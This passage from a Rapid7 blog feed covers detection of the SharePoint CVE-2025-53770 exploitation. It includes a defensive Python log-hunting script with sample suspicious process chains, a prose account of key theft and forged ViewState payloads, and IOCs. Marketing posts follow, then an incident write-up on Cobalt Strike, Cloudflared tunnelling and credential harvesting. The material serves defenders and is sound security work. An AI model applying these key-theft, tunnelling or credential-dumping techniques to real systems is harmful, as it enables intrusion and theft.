One effective high-confidence detection involves process chains spawned from the IIS worker process.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In particular: </span><span style='font-size: undefined;'><span data-type='inlineCode'>w3wp.exe ➝ cmd.exe ➝ powershell.exe -EncodedCommand</span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This pattern is not normal for SharePoint servers, should be treated as indicative of compromise, and has proven effective in detecting exploitation attempts of CVE-2025-53770. It is a high-confidence signal rather than a complete one: a deserialization payload that runs entirely inside the w3wp.exe process spawns no child process at all, so file-creation telemetry for the LAYOUTS directory and the IIS request logs should be reviewed alongside it.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-53770, including indicators of compromise (IOCs), YARA rules and emerging TTPs.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>InsightVM and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>InsightVM and Nexpose customers can assess exposure to CVE-2025-53770 and CVE-2025-53771 with authenticated checks available in the July 21 content release. 
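</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The process chain described in the MDR section above and the network and file indicators listed under Indicators of compromise below are concrete enough to turn into a hunting script. The following is an added example and not Rapid7’s detection content: a Python hunt that parses W3C-format IIS logs for POSTs to ToolPane.aspx, requests for spinstall0.aspx, the observed source IPs and the observed user-agent, and walks process-creation events to find encoded PowerShell commands that descend from w3wp.exe. It generalizes the post’s chain by following parent PIDs, so it still fires when cmd.exe is skipped or another intermediate process appears. The log layout, the field names, the pid/ppid/image/command_line event shape (a parsed Sysmon Event ID 1 record) and all sample data are assumptions constructed for the example.</span></p>

```python
"""Hunt for the CVE-2025-53770 indicators from this post in IIS logs and process events.
Added example, not Rapid7's detection content. Assumed formats: W3C IIS logs with a
#Fields: header; process events as dicts (pid, ppid, image, command_line), i.e. parsed
Sysmon Event ID 1 records."""
import re

# Indicators quoted from the post: observed source IPs, user-agent and web shell name.
SUSPECT_IPS = {"107.191.58.76", "104.238.159.149", "96.9.125.147"}
SUSPECT_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
WEBSHELL = "spinstall0.aspx"
TOOLPANE = re.compile(r"/_layouts/[^/]+/toolpane\.aspx$", re.I)  # the * is the hive (15/16)
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match those too.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)

def parse_iis_w3c(text):
    """Yield one dict per request, naming columns from the #Fields: header.
    IIS writes spaces inside a field as '+'; that is undone for the user-agent."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or foreign line: skip rather than misalign columns
        row = dict(zip(fields, values))
        if "cs(User-Agent)" in row:
            row["cs(User-Agent)"] = row["cs(User-Agent)"].replace("+", " ")
        yield row

def hunt_iis(text):
    """Return [(reasons, row)] for every request matching a web-side indicator."""
    hits = []
    for row in parse_iis_w3c(text):
        reasons = []
        uri = row.get("cs-uri-stem", "")
        if row.get("cs-method", "").upper() == "POST" and TOOLPANE.search(uri):
            reasons.append("POST to ToolPane.aspx")
        if uri.lower().endswith("/" + WEBSHELL):
            reasons.append("request to web shell path")
        if row.get("c-ip") in SUSPECT_IPS:
            reasons.append("known attacker IP")
        if row.get("cs(User-Agent)") == SUSPECT_UA:
            reasons.append("known attacker user-agent")
        if reasons:
            hits.append((reasons, row))
    return hits

def _basename(image):
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def hunt_process_chain(events):
    """Return the ancestry of every encoded PowerShell command that descends from
    w3wp.exe. Walking parent PIDs generalizes the post's w3wp -> cmd -> powershell
    chain: cmd.exe may be absent or replaced by another intermediate."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if _basename(e["image"]) != "powershell.exe" or not ENCODED_FLAG.search(e["command_line"]):
            continue
        chain, seen = [_basename(e["image"])], {e["pid"]}
        parent = by_pid.get(e["ppid"])
        while parent and parent["pid"] not in seen:  # 'seen' guards against PID-reuse loops
            seen.add(parent["pid"])
            chain.append(_basename(parent["image"]))
            parent = by_pid.get(parent["ppid"])
        if "w3wp.exe" in chain:
            hits.append(" -> ".join(reversed(chain)))
    return hits

# Constructed sample telemetry, not real logs: two attacker requests and one benign one.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-19 03:12:44 10.0.0.5 POST /_layouts/15/ToolPane.aspx - 443 - 107.191.58.76 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 200 0 0 187
2025-07-19 03:12:51 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 107.191.58.76 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 200 0 0 42
2025-07-19 03:13:02 10.0.0.5 GET /sites/hr/SitePages/Home.aspx - 443 CORP\\jdoe 10.20.30.40 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 200 0 0 95
"""
# Constructed process events; the base64 argument is a placeholder, not a real payload.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 800, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": 'w3wp.exe -ap "SharePoint - 80"'},
    {"pid": 5311, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -EncodedCommand QQBBAEEA"},
    {"pid": 5320, "ppid": 5311, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -EncodedCommand QQBBAEEA"},
    {"pid": 6001, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -NoProfile -File C:\\scripts\\backup.ps1"},  # benign: not under w3wp
]

if __name__ == "__main__":
    for reasons, row in hunt_iis(SAMPLE_IIS_LOG):
        print(row["time"], row["c-ip"], row["cs-method"], row["cs-uri-stem"], "->", ", ".join(reasons))
    for chain in hunt_process_chain(SAMPLE_EVENTS):
        print("suspicious process chain:", chain)
```

<p style="direction: ltr;"><span style='font-size: undefined;'>Run it against a copy of the server’s IIS log directory and a Sysmon Event ID 1 export rather than the embedded samples. The user-agent is compared after undoing IIS’s plus-for-space encoding, which is why the post also lists the plus-encoded form for raw log searches. A match on the IP or user-agent indicators alone is lower confidence than a ToolPane.aspx POST or a request for the web shell path, since both can change between campaigns.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>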
Authenticated checks for CVE-2025-49704 and CVE-2025-49706 have been available since the July 8 content release.</span></p><h2 style="direction: ltr;">Technical details</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The exploit chain demonstrates a dangerous evolution in SharePoint exploitation techniques, blending old deserialization tricks with new methods of persistence and privilege escalation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Initial access begins with a specially crafted POST request to the vulnerable SharePoint endpoint: </span><span style='font-size: undefined;'><span data-type='inlineCode'>/_layouts/*/ToolPane.aspx</span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This request leverages the way SharePoint renders controls on the page, ultimately coercing the server into executing embedded PowerShell commands. Once the attacker achieves execution, a malicious web shell named spinstall0.aspx is deployed to the server’s layouts directory.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But this is just the foothold. What follows is a more sophisticated move: the attacker issues a GET request to their web shell and extracts the </span><span style='font-size: undefined;'><span data-type='inlineCode'>ValidationKey</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>DecryptionKey</span></span><span style='font-size: undefined;'> from the SharePoint server. These cryptographic keys are fundamental to how SharePoint authenticates users and protects sensitive session data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By stealing these secrets, attackers are no longer limited to reusing their initial exploit path. They can now forge their own authentication tokens, impersonate users, and craft valid payloads. 
Off-the-shelf tooling makes it straightforward to serialize a malicious object and sign it with the stolen keys. The result is full remote code execution (RCE) without any need for the attacker to retain access to the original vulnerable endpoint.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This technique is inspired by earlier attacks, notably CVE-2021-28474, where exploitation hinged on signing a malicious ViewState payload with the correct </span><span style='font-size: undefined;'><span data-type='inlineCode'>ValidationKey</span></span><span style='font-size: undefined;'>. Previously, that required access to the configuration file or to process memory; now attackers simply steal the keys post-exploitation and move to the next phase.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What makes this particularly dangerous is that the persistence is not only at the file level. Even if defenders remove the web shell or block access to </span><span style='font-size: undefined;'><span data-type='inlineCode'>ToolPane.aspx</span></span><span style='font-size: undefined;'>, the stolen cryptographic keys allow attackers to re-enter the environment at will with signed payloads that are indistinguishable from legitimate traffic, and applying the patch does nothing to revoke them.</span></p><h2 style="direction: ltr;">Indicators of compromise (IOCs)</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>IP Addresses (Observed in exploitation)</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>107.191.58[.]76</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>104.238.159[.]149</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>96.9.125[.]147</span></span></p></li></ul><h3 style="direction: ltr;"><span
style='color:rgb(67, 67, 67);'>User-Agent Strings</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>URL-encoded variant for log searches: </span><span style='font-size: undefined;'><span data-type='inlineCode'>Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0</span></span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Malicious File</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>spinstall0.aspx</span></span><span style='font-size: undefined;'> (web shell)</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>SHA256: </span><span style='font-size: undefined;'><span data-type='inlineCode'>92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Disk path: </span><span style='font-size: undefined;'><span data-type='inlineCode'>C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx</span></span></p></li></ul></ul><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 22, 2025:</strong></span><span style='font-size: undefined;'> Added new remediation info for Microsoft SharePoint Enterprise Server 2016. Clarified that InsightVM checks shipped on July 21.</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-microsoft-sharepoint-servers-cve-2025-53770</link>
      <guid isPermaLink="false">blt45d8285c26a1643e</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Tue, 22 Jul 2025 14:21:33 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Outnumbered. Never Outmatched: Inside Rapid7’s 24/7 Threat Response Engine]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>In today’s threat landscape, security teams face a harsh reality: attackers never rest, and defenders are stretched thin. As threats grow in volume, speed, and sophistication, the pressure on SOC teams is reaching a breaking point. That’s why we’re launching our new Managed Detection and Response (MDR) campaign with one simple truth: you may be outnumbered, but with Rapid7 MDR, you are never outmatched.</span></p><h3><span style='font-size: undefined;'>The MDR problem statement</span></h3><p><span style='font-size: undefined;'>The need for MDR has never been clearer. Security leaders are navigating a perfect storm of alert fatigue, talent shortages, and increasingly complex hybrid environments. Attackers are moving faster, using automation and AI to scale their operations. Meanwhile, internal teams struggle to triage thousands of alerts, stay ahead of threats, and prove the value of their efforts.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to Gartner, 60% of businesses will rely on MDR services by 2025 to extend their SOC’s reach (1). But not all MDR is created equal. Many services stop short at detection or pass off alerts without context. Rapid7 MDR goes further.</span></p><h3><span style='font-size: undefined;'>What makes Rapid7 MDR different</span></h3><p><span style='font-size: undefined;'>Rapid7 MDR delivers 24/7, expert-led detection and response across every layer of your environment, from endpoint to cloud, identity to network. Our AI-powered triage cuts through alert noise with 99.93% accuracy, giving analysts time back to focus on real threats. Our global SOC actively investigates and contains attacks in real time, while our platform integrates cleanly with your existing SIEM and XDR workflows. With named advisors guiding your strategy and total visibility into our operations, you get more than alerts. 
You get a partner that thinks like an attacker and acts like an extension of your team.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It’s MDR that thinks like an attacker, but acts like a teammate.</span></p><h3><span style='font-size: undefined;'>Start here: two essential guides for MDR success</span></h3><p>To help you take the next step in your detection and response strategy, we’re releasing two cornerstone resources:</p><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://www.rapid7.com/lp/mdr-buyers-guide/" target="_self"><span style='font-size: undefined;'><strong>The Complete MDR Buyer’s Guide</strong></span></a><span style='font-size: undefined;'>: What to look for, what to ask, and how to choose the right partner for your business.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://www.rapid7.com/lp/aws-generative-ai-solutions-ebook/" target="_self"><span style='font-size: undefined;'><strong>Scaling MDR Outcomes with AI, Powered by AWS eBook</strong></span></a><span style='font-size: undefined;'>: An inside look at how our SOC uses generative AI and agentic automation to investigate and respond to threats at scale.</span></p></li></ul><p>These assets are designed to help your team evaluate MDR options with clarity and confidence.</p><h3><span style='font-size: undefined;'>Why it matters now</span></h3><p><span style='font-size: undefined;'>Cybercrime is scaling like a business. AI-powered attacks, ransomware-as-a-service, and identity-based breaches are no longer edge cases. They’re everyday threats. 
And most teams can’t fight back alone.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR was built to close the gap between signal and response, risk and action, burnout and resilience.</span></p><h3><span style='font-size: undefined;'>Get started</span></h3><p><span style='font-size: undefined;'>Download the </span><a href="https://www.rapid7.com/lp/mdr-buyers-guide/" target="_self"><span style='font-size: undefined;'>buyer’s guide.</span></a><span style='font-size: undefined;'> Explore the </span><a href="https://www.rapid7.com/lp/aws-generative-ai-solutions-ebook/" target="_self"><span style='font-size: undefined;'>AWS eBook.</span></a><span style='font-size: undefined;'> And see how Rapid7 helps teams move faster, act smarter, and stay in control—even when they’re outnumbered.</span></p><hr><p style="direction: ltr;"><span style='font-size: undefined;'><em>(1) Source: Gartner, Market Guide for Managed Detection and Response Services, </em></span><span style='font-size: undefined;'>February 2023</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/outnumbered-never-outmatched-inside-rapid7s-24-7-threat-response-engine</link>
      <guid isPermaLink="false">blt09970f8552f52c3d</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[AWS]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 21 Jul 2025 14:10:22 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 Recognized as a Leader in the 2025 Frost Radar™ for Managed Detection and Response]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>We’re proud to announce that Frost & Sullivan has named Rapid7 a Leader in its annual </span><a href="https://www.rapid7.com/lp/frost-radar-mdr-2025/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog&amp;utm_campaign=global-mdr-frost-radar-mdr-2025-prospect-eng" target="_self"><span style='font-size: undefined;'>Frost Radar™: Managed Detection and Response</span></a><span style='font-size: undefined;'> (MDR), affirming our position among the top innovators and fastest-growing providers in the category!</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This recognition comes as global security teams face steadily increasing pressure to </span><span style='font-size: undefined;'><em>do more with less, </em></span><span style='font-size: undefined;'>i.e. improve threat coverage, reduce operational complexity, and demonstrate security program value. As the MDR market matures, so do (and should) expectations from customers. This year’s Radar highlights the providers best positioned to deliver on those expectations by balancing advanced technology, proven service delivery, and a clear strategy for addressing the cybersecurity resilience needs of modern organizations.</span></p><h3><span style='font-size: undefined;'>Why Frost & Sullivan positioned Rapid7 as a Leader</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Frost & Sullivan considered 120 MDR vendors and evaluated 19 leaders in its Innovation and Growth index. </span><br/><span style='font-size: undefined;'>Rapid7’s placement as a Leader reflects our long-standing investment in core detection and response capabilities, alongside our ability to scale those innovations across a growing and diverse customer base. 
</span><br/><span style='font-size: undefined;'>Key contributors to our leadership, as highlighted by Frost & Sullivan, include:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Deep integration between MDR and exposure management, allowing organizations to close the loop between detection and risk with attack surface monitoring and risk-aware response</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>AI-powered triage and investigation support, delivering 200+ hours in weekly SOC time savings while maintaining 99.93% benign alert triage accuracy and full transparency into decision logic</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Shared, unified platform experience, giving customers direct access to the same tools our analysts use for investigation, detection, and response</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Support for over 180 native and third-party integrations, enabling visibility and protection across hybrid environments without requiring tool rip-and-replace</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>“Rapid7 focuses on delivering visibility, transparency, and peace of mind for its customers… aligning the development of its platform and service model to the most important mega trends in the space, such as AI-powered SOCs, third-party integration, preventative features, and more.” </span><span style='font-size: undefined;'><em>Frost & Sullivan, 2024 Frost Radar: MDR</em></span></p><h3><span style='font-size: undefined;'>The Market is catching up to the promise of MDR</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s placement as a Leader in this </span><a 
href="https://www.rapid7.com/lp/frost-radar-mdr-2025/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog&amp;utm_campaign=global-mdr-frost-radar-mdr-2025-prospect-eng" target="_self"><span style='font-size: undefined;'>Frost & Sullivan Radar</span></a><span style='font-size: undefined;'> comes at a pivotal moment for the MDR market. Organizations are no longer just looking for alert triage or outsourced detection – they need integrated, outcome-driven security operations. The convergence of detection response and exposure management, paired with the emergence of AI as a force multiplier, is reshaping what MDR must deliver to customers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security teams today are tasked with more than stopping threats quickly – they must understand how those threats intersect with asset exposure and business risk. That requires an MDR partner that can integrate broad security telemetry, threat intelligence and contextual risk into a single platform for action. Without that connective tissue, SecOps is stuck in reactive cycles and fragmented experiences.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>It is not enough for SecOps teams to ‘tick the box’ with an MDR provider, it is about delivering measurable outcomes. That means faster time to detect and respond, higher fidelity investigations, and reduced risk across the attack surface. To scale those outcomes, intelligent automation and agentic AI must be part of the approach. While human expertise remains essential for judgement and escalation, AI is critical for accelerating workflows, enhancing accuracy and extending the capacity of the SOC through autonomous technology.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That’s the future we’re building at Rapid7 – and why Frost & Sullivan recognized us as a Leader in MDR. 
We’re delivering the outcomes customers need today and innovating toward what they’ll demand tomorrow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Interested in learning more about Rapid7’s approach to Managed Detection and Response? </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog&amp;utm_campaign=global-mdr-frost-radar-mdr-2025-prospect-eng" target="_self"><span style='font-size: undefined;'><em>Let’s discuss how you can be part of this future</em></span></a><span style='font-size: undefined;'><em>.</em></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/rapid7-recognized-as-a-leader-in-the-2025-frost-radar-for-managed-detection-and-response</link>
      <guid isPermaLink="false">blt72e1c3caff67ae93</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Awards]]></category><dc:creator><![CDATA[Cindy Stanton]]></dc:creator>
      <pubDate>Wed, 16 Jul 2025 15:15:16 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt39eb01dc7f434720/68779d36f2bd48596ada9d78/Managed_Detection_and_Response_2025_Radar_Image_Rapid7_Cropped.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Innovative Tunnelling and Forensic Tool Abuse: IR Tales from the Field]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'><em>Rapid7 Incident Response consultants Willow Shipperley and Noah Hemker contributed analysis and insight to this blog.</em></span></p><h2 style="direction: ltr;">Executive summary</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s Incident Response (IR) team was engaged to investigate an incident involving an attempted Cobalt Strike execution. The investigation uncovered twists and turns with pre-ransomware activities, tunneling tools, and attackers taking a page out of the defender’s playbook. The attacker took careful steps to maintain access to the environment through persistence that mimicked normal user behavior. This blog covers the techniques, indicators of compromise (IoCs), and detections for Rapid7 customers.</span></p><h2 style="direction: ltr;">Observed attacker behavior</h2><p style="direction: ltr;"><span style='font-size: undefined;'>In this incident, the attacker executed an elegantly obfuscated PowerShell command to establish a Cobalt Strike beacon. Cobalt Strike (CS) is often used after an attacker has gained a comfortable foothold in an environment; CS is a powerful and dynamic tool useful for maintaining persistent access and executing commands remotely. 
As with any IR investigation, it was imperative to gather answers effectively, beginning with knowing which questions to ask: </span><span style='font-size: undefined;'><em>where</em></span><span style='font-size: undefined;'> did CS attempt to execute, </span><span style='font-size: undefined;'><em>who</em></span><span style='font-size: undefined;'> attempted to execute it, </span><span style='font-size: undefined;'><em>what</em></span><span style='font-size: undefined;'> other malicious activity occurred, and — most importantly — </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> did an attacker get to this point in the first place?</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Initial scoping</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The first step in answering these questions involved compiling a list of IoCs from the identified activity. To start, these IoCs included Command & Control (C2) information (e.g., hardcoded IP addresses and the domains they resolve to) extracted from the obfuscated PowerShell command, and the name of the account that executed it. Searching for references to IoCs can reveal further information, including other malicious commands executed by the compromised account, other compromised assets, and other compromised accounts. As new IoCs are identified, it is critical to add each to the growing list and search for further references to them across the environment. Once compromised assets and accounts are identified, a containment strategy must be developed. 
Quarantining assets, disabling accounts, blocking host and network-based IoCs, and disabling remote services can all aid in containing a compromise before an attacker can attain their goals.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Following the initial scoping and containment measures, the investigation turned to reconstructing the attacker’s path through the environment in a timeline. This structure keeps focus on answering the most important questions, sheds light on the attacker’s goals, and identifies gaps that require deeper investigation. At the very end of this timeline was the attempted execution of a malicious batch script. The script’s name, location, and method of execution shared similarities to known ransomware tactics, techniques, and procedures (TTPs). Thankfully, the script’s execution was blocked by the endpoint security tooling used in the environment, and the typical pre-ransomware activity, such as disabling event logging, deleting backups, and killing processes, was not observed. 
This discovery revealed the attacker’s goals; however, it did not provide insight into </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> the attacker moved through the environment to get to this point, </span><span style='font-size: undefined;'><em>where</em></span><span style='font-size: undefined;'> the attacker acquired the credentials allowing such movement, or </span><span style='font-size: undefined;'><em>when</em></span><span style='font-size: undefined;'> the attacker first gained access to the environment.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Lateral movement with tunneling tools</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The first major breakthrough was identifying the execution of PuTTY Link (Plink) and Cloudflare Tunnel (Cloudflared), two versatile network traffic tunneling tools that allow a user to connect to network resources that might otherwise be inaccessible. Although the tunneling tools were executed on a relatively small number of assets, the implications of an attacker abusing them were serious. With either tool, it is simple to set up a Remote Desktop Protocol (RDP) or Secure Shell (SSH) connection between a compromised asset and attacker-controlled infrastructure for remote authentication, remote code execution (RCE), or both.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The attacker used Plink first, attempting to set up tunnels to external IP addresses for future RCE. Fortunately, each attempt was automatically blocked by endpoint security tooling. After those repeated failures, Cloudflared was introduced and used throughout the rest of the compromise. Why was Cloudflared successful where Plink had failed, when both tools produce similar results? 
The major difference was that while Plink attempted to establish connections directly to external C2 servers, Cloudflared proxied all external traffic through Cloudflare’s legitimate network. Since the compromised environment already routed its network traffic through Cloudflare, the Cloudflared tool was able to establish and maintain malicious connections without trouble. This served the attacker well as both a means of reliable network communication and a form of defense evasion: the true IP addresses and domains associated with their C2 servers were never directly recorded, and their malicious traffic blended in amongst the normal traffic generated in the environment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Beyond the expected communication with malicious external resources, Cloudflared was used for both RDP and SSH sessions </span><span style='font-size: undefined;'><em>between</em></span><span style='font-size: undefined;'> internal assets in the compromised environment as a method of lateral movement. The attacker then took Cloudflared’s capabilities a step further by setting up network tunnels between internal assets that functioned as a relay: not only for traditional remote access, but also to transfer data, execute commands, and deploy malware. Such dynamic and clever usage of Cloudflared indicated that the attacker was familiar with the compromised environment, and answered the important questions of </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> the attacker moved throughout the environment, as well as </span><span style='font-size: undefined;'><em>how</em></span><span style='font-size: undefined;'> the attacker was able to deploy CS and execute the ransomware batch script. 
To continue constructing the incident’s timeline, the next major question to answer was </span><span style='font-size: undefined;'><em>where</em></span><span style='font-size: undefined;'> the attacker acquired the account credentials that allowed for this lateral movement.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Credential access with FTK Imager</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Credential access and harvesting can be performed through a plethora of techniques. Sometimes accounts have weak passwords that can be easily guessed, or poor security controls like a lack of multi-factor authentication (MFA). Other times, password hashes, cached logon information, and LSA secrets are collected from registry hives or dumped from the memory of vital Windows processes like LSASS. These more complex credential harvesting methods require a deeper understanding of how Windows stores and uses passwords in practice to properly acquire and effectively use them. In this incident, the attacker performed no fewer than four different methods of credential harvesting.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The first method was a classic: an Active Directory (AD) brute-forcing tool — in this case, PlusBrute — tested combinations of common account names and passwords to see if any resulted in successful authentications. Not a particularly elegant method, but certainly simple and effective when a targeted environment’s security practices may be weak or outdated. The second and third methods, using the Impacket framework and WinRAR respectively, focused on the more complex credential information stored in registry hives, which can be cracked to reveal plaintext passwords or used intact in more complex techniques. 
The Impacket framework, a modular and open-source collection of Python scripts, was used in an attempt to extract only the relevant credential information from select registry hives, while the file compression and archiving tool WinRAR attempted to collect entire registry hives. However, the final credential harvesting method was of particular interest: the attacker installed a legitimate digital forensics tool.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Digital forensics tools come in many varieties. Several serve hyper-specific purposes, like parsing a single type of forensic artifact into a human-readable format, while others handle a wider scope of data collection, parsing, and analysis needs. By necessity, many of these tools have the ability to collect forensic artifacts that may contain encoded credential information, such as password hashes stored in registry keys, as those forensic artifacts often contain information vital to a security incident. As this can set off many antivirus programs, some of these tools will automatically create exceptions for common antivirus software to ensure that their intended functionality is not hindered.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In this incident, the attacker installed Exterro’s legitimate and free-to-use digital forensics tool, FTK Imager, on over a dozen assets. The installation process for FTK Imager included the creation of antivirus exceptions, allowing the attacker to collect entire registry hives as well as any other forensic artifacts containing useful credential information, without risk of interruption. 
</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Initial access</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>These varied methods of credential harvesting filled in many gaps in the investigation’s timeline, and revealed where the attacker acquired the credential information necessary to move through the environment. The only question remaining was how and where the attacker first gained access to the environment. This key point of an incident is referred to as the initial access vector (IAV). Unfortunately, in many investigations, there is not enough relevant forensic data to clearly define the IAV. Despite that, there are many ways to home in on the first few minutes of malicious activity in an incident. When an attacker first gains access to an asset, they must work out what they have access to — it could be an individual’s home PC, or a valuable server in a corporate environment. To gather that information, an attacker will execute discovery commands that provide details about the compromised asset, account, and accessible resources. In this incident, those initial discovery commands were executed by an old service account that did not require MFA for authentication. The poor security controls used by this account made it an easy target for initial access.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With these final pieces of information, the full timeline of the incident became clear. An attacker gained initial access to the environment through a service account with minimal protections. Through that service account, the attacker abused native Windows binaries 